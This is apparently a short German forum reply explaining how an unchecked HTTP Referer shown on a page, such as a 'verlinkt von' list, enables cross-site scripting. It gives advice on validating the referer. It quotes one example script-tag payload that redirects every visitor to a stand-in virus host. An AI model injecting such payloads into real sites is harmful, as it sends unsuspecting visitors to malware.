Maxx: Sicherheitslücke PHP Referrer

Beitrag lesen

Hallo Kodi,

Was kann ein unsicherer Referrer anrichten

manche Webseiten führen irgendwo auf der Seite eine Liste: "verlinkt von" oder "letzte Besucher von:" Wenn dort ungeprüft der Referer verwendet wird kann man einen Referer in der Art:

<script type="text/javascript">location.href="http://SeiteMitVirus.de"</script>

einschmuggeln. Und künftig wird jeder Besucher der Seite (sofern javascript aktiv ist) auf http://SeiteMitVirus.de umgeleitet.

So kann man auch neugierige Webmaster auf verseuchte Seiten locken. Die Referer werden fast immer in den Logfiles des Servers angezeigt. Ein unvorsichtiger Klick (der flasche Browser) und schon hat man sich was eingefangen.

wie kann ich mich vor diesen manipulationen schützen?

Den Referer nie ungeprüft verwenden und für den zweiten Fall http://brain.yubb.de/

Grüße,

Jochen

--
Kritzeln statt texten:
Scribbleboard